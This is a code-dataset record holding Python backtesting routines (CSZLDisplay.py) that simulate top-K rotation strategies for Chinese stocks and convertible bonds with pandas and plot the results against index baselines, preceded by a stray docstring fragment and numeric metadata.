Set: Position(self: GZipStream) = value
"""
| 28.296782
| 221
| 0.608862
| 2,549
| 23,741
| 5.523342
| 0.110632
| 0.023865
| 0.03182
| 0.040912
| 0.89978
| 0.872931
| 0.852901
| 0.849137
| 0.844165
| 0.840898
| 0
| 0.003085
| 0.317299
| 23,741
| 838
| 222
| 28.330549
| 0.86556
| 0.595257
| 0
| 0.866242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.343949
| false
| 0.343949
| 0
| 0
| 0.490446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
65787b68a0b5e1c3c626ba7fd5823a96f53459eb
| 38,990
|
py
|
Python
|
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
#coding=utf-8
import pandas as pd
import numpy as np
import CSZLData
import matplotlib
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
class CSZLDisplay(object):
"""description of class"""
def Topk_nextopen(self,resultpath):
#df_all = pd.read_csv('./Database/Dailydata.csv',index_col=0,header=0)
#df_adj_all=pd.read_csv('./Database/Daily_adj_factor.csv',index_col=0,header=0)
#df_limit_all=pd.read_csv('./Database/Daily_stk_limit.csv',index_col=0,header=0)
df_all = pd.read_pickle('./Database/Dailydata.pkl')
df_adj_all = pd.read_pickle('./Database/Daily_adj_factor.pkl')
df_limit_all = pd.read_pickle('./Database/Daily_stk_limit.pkl')
df_all=pd.merge(df_all, df_adj_all, how='left', on=['ts_code','trade_date'])
df_all=pd.merge(df_all, df_limit_all, how='left', on=['ts_code','trade_date'])
score_df = pd.read_csv(resultpath,index_col=0,header=0)
#score_df=score_df[['ts_code','trade_date','mix']]
score_df=score_df[['ts_code','trade_date','mix_rank','Shift_1total_mv_rank','close_show']]
#score_df = pd.read_csv('zzzzfackdatapred_fullold.csv',index_col=0,header=0)
#print(df_all)
print(score_df)
#hold_all=5
#change_num=1
hold_all=30
change_num=5
account=100000000
accountbase=account
buy_pct=0.9
Trans_cost=0.997 #千三
# balance random none
choicepolicy="none"
###添加停牌计算和涨跌停简单策略
#stop_state 当日不停牌为0,当日停牌为1 (TODO:前日停牌本日不停牌为2,不每日刷新),每日刷新
#control_state_open 当日不停牌且开盘未触及涨跌停为0,当日开盘触及跌停为1,当日开盘触及涨停为2,每日刷新
#control_state_close 当日不停牌且收盘没有触及涨跌停为0,当日收盘触及跌停1,当日收盘触及涨停为2,每日刷新
#last_action_flag 前日不需要买入卖出为0,前日需要卖出为1,前日需要买入为2
codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
#codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
#print(codelist)
score_df=score_df.sort_values(by=['trade_date'])
datelist=score_df['trade_date'].unique()
cur_hold_num=0
print(datelist)
days=0
show3=[]
last_cur_merge_df=[]
for cur_date in datelist:
#这里注意停牌的不包含在这个list中
cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
cur_merge_df['mix_rank'].fillna(-99.99, inplace=True)
if len(last_cur_merge_df):
cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
cur_merge_df['last_mix_rank'].fillna(-99.99, inplace=True)
#if cur_date>20180102 :
# cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
code_value_sum=0
if codelist.shape[0]>0 :
codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
#刷新停牌的close和adj价值
codelist_buffer['adj_factor'].fillna(9999.99, inplace=True)
codelist_buffer['close'].fillna(9999.99, inplace=True)
codelist_buffer['open'].fillna(9999.99, inplace=True)
codelist_buffer['control_state_open']=0
codelist_buffer['control_state_close']=0
codelist_buffer['stop_state']=0
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'stop_state']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
###更新除权
##print(codelist_buffer.head(10))
codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']*codelist_buffer['adj_factor']/codelist_buffer['last_adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#print(codelist_buffer.head(10))
codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
codelist.loc[:,'lastprice']=codelist_buffer['open']
codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
#codelist_buffer.reset_index(inplace=True,drop=True)
#code_value_sum=codelist_buffer['value'].sum()
#todo fillna
#pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
#print(cur_merge_df)
#sell==========================
sellto=hold_all-change_num
sellnum=cur_hold_num-sellto
if sellnum>0:
#初始化本日卖出flag sell_value 每日刷新
#初始化本日卖出计数
codelist_buffer['sell_value']=0
#sell_count=0
#先看open是否为2,是则消除前日的卖出flag
#codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
#按open更新当日的sell_value,并且增加计数
#(前日卖出flag为1,当日open是1,当日close不是1,这种情况按score来算)
#see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
#if(see>0):
# print(codelist_buffer)
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(sell_count!=0):
# print(codelist_buffer)
#sellnum=sellnum-sell_count
#根据分数排序
codelist_buffer=codelist_buffer.sort_values(by=['last_mix_rank'])
#先将这些分数低的更新last_action_flag为1
codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
#更新当日control_state_close不跌停的的sell_value
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['close']*codelist_buffer['buy_amount']
#排除跌停卖出
#统计所有的sell_value大于0的并drop掉更新list
account=account+codelist_buffer['sell_value'].sum()*Trans_cost
cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(cur_hold_num!=80):
# print(codelist_buffer)
#codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
sdfafa=1
#buy==========================
buyto=hold_all
buynum=buyto-cur_hold_num
if(buynum>0 and len(last_cur_merge_df)):
buy_all_value=0
if(codelist.shape[0]>0):
hold_code_sum=codelist_buffer['value'].sum()
buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
else:
buy_all_value=account*buy_pct
#when account too low then don't do anything
if(buy_all_value<10000):
continue
code_amount_buy=buy_all_value/buynum
cur_merge_df=cur_merge_df.sort_values(by=['last_mix_rank'])
buylist=cur_merge_df
#single code no repeat
buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
#todo can't buy highstop
#buylist=buylist[buylist['pct_chg']<4]
buylist=buylist[buylist['open']!=buylist['up_limit']]
#buylist=buylist[buylist['pct_chg']>-9]
if choicepolicy=="random":
buylist = shuffle(buylist,random_state=4)
elif choicepolicy=="balance":
headnum=buynum/20+1
test=buylist.groupby('Shift_1total_mv_rank').tail(headnum)
#print(buylist)
buylist=test.sort_values(by=['last_mix_rank'])
#错误示范,预知未来
buylist=buylist[buylist['last_amount']>1500]
#buylist.to_csv("comp.csv")
#print(buylist)
buylist=buylist.tail(buynum)
buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
#buylist['buyuse']=code_amount_buy/buylist['close']
buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
buylist['value']=buylist['open']*buylist['buyuse']
#seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
#print(seelist)
account=account-buylist['value'].sum()
#上日控制flag用于给后一日提供买卖信息,默认为0
buylist['last_action_flag']=0
savebuylist=buylist[['ts_code','open','buyuse','adj_factor','last_action_flag']]
savebuylist.columns = ['ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag']
codelist=codelist.append(savebuylist)
#todo 这里因为下个循环drop会用到index如果不重新排序会造成问题,先这样改如果需要提升速度再进行修正
codelist.reset_index(inplace=True,drop=True)
cur_hold_num+=buynum
sdfafa=1
#print(codelist)
#codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
bufferdf=codelist['buy_amount']*codelist['lastprice']
#if(cur_date>20171018):
# print(codelist)
#print(codelist)
code_value_sum=bufferdf.sum()
print(account+code_value_sum)
print(cur_date)
show3.append(account+code_value_sum)
last_cur_merge_df=cur_merge_df[["ts_code","mix_rank","amount"]]
last_cur_merge_df.columns =['ts_code','last_mix_rank','last_amount']
#print(last_cur_merge_df)
days+=1
days=np.arange(1,datelist.shape[0]+1)
eee=np.where(days%5==0)
daysshow=days[eee]
datashow=datelist[eee]
#a = np.random.rand(days.shape[0], 1)
#a=np.load('a.npy')
#a=a.tolist()
#print(a)
#plt.plot(days,a,c='red',label='CB')
if True :
#000001.SH 上证 000016.SH 50 000688.SH 科创50 000905.SH 中证500 399006.SZ 创业板指
#399300.SZ 300 000852.SH 1000
baselinecode='399300.SZ'
baseline1=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline1,c='m',label=baselinecode)
baselinecode='399006.SZ'
baseline2=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline2,c='c',label=baselinecode)
baselinecode='000852.SH'
baseline3=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline3,c='y',label=baselinecode)
baselinecode='000905.SH'
baseline4=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline4,c='k',label=baselinecode)
print(show3)
plt.plot(days,show3,c='green',label="TOPK_open_head30")
plt.xticks(daysshow, datashow,color='blue',rotation=60)
plt.legend()
plt.show()
input()
asdffd=1
def Topk_nextopen_mix(self,resultpath):
#df_all = pd.read_csv('./Database/Dailydata.csv',index_col=0,header=0)
#df_adj_all=pd.read_csv('./Database/Daily_adj_factor.csv',index_col=0,header=0)
#df_limit_all=pd.read_csv('./Database/Daily_stk_limit.csv',index_col=0,header=0)
df_all = pd.read_pickle('./Database/Dailydata.pkl')
df_adj_all = pd.read_pickle('./Database/Daily_adj_factor.pkl')
df_limit_all = pd.read_pickle('./Database/Daily_stk_limit.pkl')
df_all=pd.merge(df_all, df_adj_all, how='left', on=['ts_code','trade_date'])
df_all=pd.merge(df_all, df_limit_all, how='left', on=['ts_code','trade_date'])
score_df = pd.read_csv(resultpath,index_col=0,header=0)
#score_df=score_df[['ts_code','trade_date','mix']]
score_df=score_df[['ts_code','trade_date','mix','Shift_1total_mv_rank','close_show']]
#score_df = pd.read_csv('zzzzfackdatapred_fullold.csv',index_col=0,header=0)
#print(df_all)
print(score_df)
#hold_all=5
#change_num=1
hold_all=30
change_num=6
account=100000000
accountbase=account
buy_pct=0.9
Trans_cost=0.997 #千三
# balance random none
choicepolicy="random"
###添加停牌计算和涨跌停简单策略
#stop_state 当日不停牌为0,当日停牌为1 (TODO:前日停牌本日不停牌为2,不每日刷新),每日刷新
#control_state_open 当日不停牌且开盘未触及涨跌停为0,当日开盘触及跌停为1,当日开盘触及涨停为2,每日刷新
#control_state_close 当日不停牌且收盘没有触及涨跌停为0,当日收盘触及跌停1,当日收盘触及涨停为2,每日刷新
#last_action_flag 前日不需要买入卖出为0,前日需要卖出为1,前日需要买入为2
codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
#codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
#print(codelist)
score_df=score_df.sort_values(by=['trade_date'])
datelist=score_df['trade_date'].unique()
cur_hold_num=0
print(datelist)
days=0
show3=[]
last_cur_merge_df=[]
for cur_date in datelist:
#这里注意停牌的不包含在这个list中
cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
cur_merge_df['mix'].fillna(-99.99, inplace=True)
if len(last_cur_merge_df):
cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
cur_merge_df['last_mix'].fillna(-99.99, inplace=True)
#if cur_date>20180102 :
# cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
code_value_sum=0
if codelist.shape[0]>0 :
codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
#刷新停牌的close和adj价值
codelist_buffer['adj_factor'].fillna(9999.99, inplace=True)
codelist_buffer['close'].fillna(9999.99, inplace=True)
codelist_buffer['open'].fillna(9999.99, inplace=True)
codelist_buffer['control_state_open']=0
codelist_buffer['control_state_close']=0
codelist_buffer['stop_state']=0
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'stop_state']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
###更新除权
##print(codelist_buffer.head(10))
codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']*codelist_buffer['adj_factor']/codelist_buffer['last_adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
#print(codelist_buffer.head(10))
codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
codelist.loc[:,'lastprice']=codelist_buffer['open']
codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
#codelist_buffer.reset_index(inplace=True,drop=True)
#code_value_sum=codelist_buffer['value'].sum()
#todo fillna
#pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
#print(cur_merge_df)
#sell==========================
sellto=hold_all-change_num
sellnum=cur_hold_num-sellto
if sellnum>0:
#初始化本日卖出flag sell_value 每日刷新
#初始化本日卖出计数
codelist_buffer['sell_value']=0
#sell_count=0
#先看open是否为2,是则消除前日的卖出flag
#codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
#按open更新当日的sell_value,并且增加计数
#(前日卖出flag为1,当日open是1,当日close不是1,这种情况按score来算)
#see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
#if(see>0):
# print(codelist_buffer)
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
#sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(sell_count!=0):
# print(codelist_buffer)
#sellnum=sellnum-sell_count
#根据分数排序
codelist_buffer=codelist_buffer.sort_values(by=['last_mix'])
#先将这些分数低的更新last_action_flag为1
codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
#更新当日control_state_close不跌停的的sell_value
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['close']*codelist_buffer['buy_amount']
#排除跌停卖出
#统计所有的sell_value大于0的并drop掉更新list
account=account+codelist_buffer['sell_value'].sum()*Trans_cost
cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
#if(cur_hold_num!=80):
# print(codelist_buffer)
#codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
sdfafa=1
#buy==========================
buyto=hold_all
buynum=buyto-cur_hold_num
if(buynum>0 and len(last_cur_merge_df)):
buy_all_value=0
if(codelist.shape[0]>0):
hold_code_sum=codelist_buffer['value'].sum()
buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
else:
buy_all_value=account*buy_pct
#when account too low then don't do anything
if(buy_all_value<10000):
continue
code_amount_buy=buy_all_value/buynum
cur_merge_df=cur_merge_df.sort_values(by=['last_mix'])
buylist=cur_merge_df
#single code no repeat
buylist=buylist[~buylist['ts_code'].isin(codelist['ts_code'])]
#todo can't buy highstop
#buylist=buylist[buylist['pct_chg']<4]
buylist=buylist[buylist['open']!=buylist['up_limit']]
#buylist=buylist[buylist['pct_chg']>-9]
if choicepolicy=="random":
buylist = shuffle(buylist,random_state=4)
elif choicepolicy=="balance":
headnum=buynum/20+1
test=buylist.groupby('Shift_1total_mv_rank').tail(headnum)
#print(test)
buylist=test.sort_values(by=['last_mix'])
buylist=buylist.tail(buynum)
buylist.loc[:,'buyuse']=code_amount_buy/buylist['open']
#buylist['buyuse']=code_amount_buy/buylist['close']
buylist.loc[:,'buyuse']=buylist['buyuse'].round(-2)
buylist.loc[:,'buyuse']=buylist['buyuse'].astype(int)
buylist['value']=buylist['open']*buylist['buyuse']
#seelist=buylist[['ts_code','trade_date','yesterday_1total_mv_rank']]
#print(seelist)
account=account-buylist['value'].sum()
#上日控制flag用于给后一日提供买卖信息,默认为0
buylist['last_action_flag']=0
savebuylist=buylist[['ts_code','open','buyuse','adj_factor','last_action_flag']]
savebuylist.columns = ['ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag']
codelist=codelist.append(savebuylist)
#todo 这里因为下个循环drop会用到index如果不重新排序会造成问题,先这样改如果需要提升速度再进行修正
codelist.reset_index(inplace=True,drop=True)
cur_hold_num+=buynum
sdfafa=1
#print(codelist)
#codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
bufferdf=codelist['buy_amount']*codelist['lastprice']
#if(cur_date>20171018):
# print(codelist)
#print(codelist)
code_value_sum=bufferdf.sum()
print(account+code_value_sum)
print(cur_date)
show3.append(account+code_value_sum)
last_cur_merge_df=cur_merge_df[["ts_code","mix"]]
last_cur_merge_df.columns =['ts_code','last_mix']
#print(last_cur_merge_df)
days+=1
days=np.arange(1,datelist.shape[0]+1)
eee=np.where(days%5==0)
daysshow=days[eee]
datashow=datelist[eee]
#a = np.random.rand(days.shape[0], 1)
if True :
#000001.SH 上证 000016.SH 50 000688.SH 科创50 000905.SH 中证500 399006.SZ 创业板指
#399300.SZ 300 000852.SH 1000
baselinecode='399300.SZ'
baseline1=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline1,c='m',label=baselinecode)
baselinecode='399006.SZ'
baseline2=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline2,c='c',label=baselinecode)
baselinecode='000852.SH'
baseline3=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline3,c='y',label=baselinecode)
baselinecode='000905.SH'
baseline4=self.display_baseline(datelist,accountbase,baselinecode)
plt.plot(days,baseline4,c='k',label=baselinecode)
print(show3)
plt.plot(days,show3,c='green',label="TOPK_open_head30")
plt.xticks(daysshow, datashow,color='blue',rotation=60)
plt.legend()
plt.show()
input()
asdffd=1
def Topk_nextopen_CB(self,resultpath):
    """Backtest a daily top-K rotation strategy on convertible bonds (CB).

    Reads daily CB quotes from a pickle and per-day model scores from
    `resultpath`, simulates holding `hold_all` names with `change_num`
    swapped per day (fills at next-day open), then plots the equity curve
    against several index baselines.

    Side effects: changes global pandas display options, prints progress,
    shows a matplotlib window and blocks on input().
    """
    # Widen pandas display limits so debug prints show whole frames.
    pd.set_option('display.width', 5000)
    pd.set_option('display.max_rows', 500)
    pd.set_option('display.max_columns', 500)
    df_all = pd.read_pickle('./Database/CBDaily.pkl')
    # Drop rows with a zero open price (unusable for fills).
    df_all=df_all[df_all["open"]!=0]
    df_all.reset_index(inplace=True,drop=True)
    score_df = pd.read_csv(resultpath,index_col=0,header=0)
    score_df=score_df[['ts_code','trade_date','mix_rank','close_show']]
    print(score_df)
    #hold_all=5
    #change_num=1
    hold_all=10   # portfolio size
    change_num=2  # names swapped per day
    account=100000000  # starting cash
    accountbase=account
    buy_pct=0.9   # fraction of total equity deployed
    Trans_cost=0.9997 # sell-side cost multiplier; original note said "3 per mille" but 0.9997 is 0.03% -- NOTE(review): confirm intended
    # balance random none small
    choicepolicy="small"
    ### Simple handling of trading suspensions and price limits:
    #stop_state: 0 = traded today, 1 = suspended today (TODO: 2 = resumed after suspension, not refreshed daily); refreshed daily
    #control_state_open: 0 = open not at a limit, 1 = open at down-limit, 2 = open at up-limit; refreshed daily
    #control_state_close: 0 = close not at a limit, 1 = close at down-limit, 2 = close at up-limit; refreshed daily
    #last_action_flag: 0 = no action carried over, 1 = sell flagged yesterday, 2 = buy flagged yesterday
    codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_action_flag'))
    codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_action_flag'))
    #codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
    #print(codelist)
    score_df=score_df.sort_values(by=['trade_date'])
    datelist=score_df['trade_date'].unique()
    cur_hold_num=0
    print(datelist)
    days=0
    show3=[]              # daily total-equity curve
    last_cur_merge_df=[]  # previous day's scores (empty list before day 1)
    for cur_date in datelist:
        # Note: suspended instruments have no row for this date.
        cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
        cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
        cur_merge_df=pd.merge(cur_df_all,cur_score_df, how='left', on=['trade_date','ts_code'])
        cur_merge_df['mix_rank'].fillna(-99.99, inplace=True)
        if len(last_cur_merge_df):
            # Attach yesterday's score/amount/close so today's decisions only use known data.
            cur_merge_df=pd.merge(cur_merge_df,last_cur_merge_df, how='left', on=['ts_code'])
            cur_merge_df['last_mix_rank'].fillna(-99.99, inplace=True)
        #if cur_date>20180102 :
        #    cur_merge_df=cur_merge_df.to_csv("dsdf.csv")
        code_value_sum=0
        if codelist.shape[0]>0 :
            # Mark current holdings to market against today's quotes.
            codelist_buffer=pd.merge(codelist,cur_merge_df, how='left', on=['ts_code'])
            # Refresh close/adj values for suspended holdings (9999.99 = "no quote today" sentinel).
            codelist_buffer['close'].fillna(9999.99, inplace=True)
            codelist_buffer['open'].fillna(9999.99, inplace=True)
            codelist_buffer['control_state_open']=0
            codelist_buffer['control_state_close']=0
            codelist_buffer['stop_state']=0
            codelist_buffer.loc[codelist_buffer['open']==9999.99,'stop_state']=1
            # (Price-limit state tracking disabled for CBs.)
            #codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['down_limit'],'control_state_open']=1
            #codelist_buffer.loc[codelist_buffer['open']==codelist_buffer['up_limit'],'control_state_open']=2
            #codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['down_limit'],'control_state_close']=1
            #codelist_buffer.loc[codelist_buffer['close']==codelist_buffer['up_limit'],'control_state_close']=2
            #codelist_buffer.loc[codelist_buffer['adj_factor']==9999.99,'adj_factor']=codelist_buffer['last_adj_factor']
            # Suspended names keep their last seen price.
            codelist_buffer.loc[codelist_buffer['open']==9999.99,'open']=codelist_buffer['lastprice']
            ### Ex-rights adjustment (disabled; not needed for CBs).
            ##print(codelist_buffer.head(10))
            #codelist_buffer.loc[:,'buy_amount']=codelist_buffer['buy_amount']
            #codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
            #codelist_buffer.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
            #print(codelist_buffer.head(10))
            codelist.loc[:,'buy_amount']=codelist_buffer['buy_amount']
            #codelist.loc[:,'last_adj_factor']=codelist_buffer['adj_factor']
            codelist.loc[:,'lastprice']=codelist_buffer['open']
            codelist_buffer['value']=codelist_buffer['buy_amount']*codelist_buffer['open']
            #codelist_buffer.reset_index(inplace=True,drop=True)
            #code_value_sum=codelist_buffer['value'].sum()
        #todo fillna
        #pd.merge(df_all, df_long_all, how='inner', on=['ts_code','trade_date'])
        #print(cur_merge_df)
        #sell==========================
        sellto=hold_all-change_num
        sellnum=cur_hold_num-sellto
        if sellnum>0:
            # Initialise today's sell flag/value (refreshed daily).
            codelist_buffer['sell_value']=0
            #sell_count=0
            # (Disabled) if the open hit the up-limit, clear yesterday's sell flag.
            #codelist_buffer.loc[codelist_buffer['control_state_open']==2,'last_action_flag']=0
            # (Disabled) set sell_value from the open price and count the sells.
            # (Yesterday flagged a sell, open at down-limit but close not: fall back to score.)
            #see=codelist_buffer[codelist_buffer['last_action_flag']==1].shape[0]
            #if(see>0):
            #    print(codelist_buffer)
            #codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
            #codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_close']!=1),'sell_value']=codelist_buffer['open']*codelist_buffer['buy_amount']
            #sell_count=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
            #if(sell_count!=0):
            #    print(codelist_buffer)
            #sellnum=sellnum-sell_count
            # Sort holdings by yesterday's score, worst first.
            codelist_buffer=codelist_buffer.sort_values(by=['last_mix_rank'])
            #print(codelist_buffer)
            # Flag the sellnum lowest-scoring holdings for sale.
            codelist_buffer.loc[codelist_buffer['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
            codelist.loc[codelist['ts_code'].isin(codelist_buffer['ts_code'].head(sellnum)),'last_action_flag']=1
            # Realize proceeds at today's valuation; suspended names are force-sold too.
            codelist_buffer.loc[(codelist_buffer['last_action_flag']==1)&(codelist_buffer['control_state_open']!=1),'sell_value']=codelist_buffer['value']
            codelist_buffer.loc[(codelist_buffer['stop_state']==1),'sell_value']=codelist_buffer['value']
            # Credit proceeds (net of transaction cost) and drop sold rows from both frames.
            account=account+codelist_buffer['sell_value'].sum()*Trans_cost
            cur_hold_num-=codelist_buffer[codelist_buffer['sell_value']>0].shape[0]
            #if(cur_hold_num!=80):
            #    print(codelist_buffer)
            #codelist_buffer.drop(codelist_buffer['sell_value']>0,inplace=True)
            codelist_buffer=codelist_buffer[codelist_buffer['sell_value']==0]
            codelist=codelist[codelist['ts_code'].isin(codelist_buffer['ts_code'])]
            sdfafa=1
        #buy==========================
        buyto=hold_all
        buynum=buyto-cur_hold_num
        if(buynum>0 and len(last_cur_merge_df)):
            # Budget: deploy buy_pct of total equity, minus what is already held.
            buy_all_value=0
            if(codelist.shape[0]>0):
                hold_code_sum=codelist_buffer['value'].sum()
                buy_all_value=(account+hold_code_sum)*buy_pct-hold_code_sum
            else:
                buy_all_value=account*buy_pct
            #when account too low then don't do anything
            if(buy_all_value<10000):
                continue
            code_amount_buy=buy_all_value/buynum
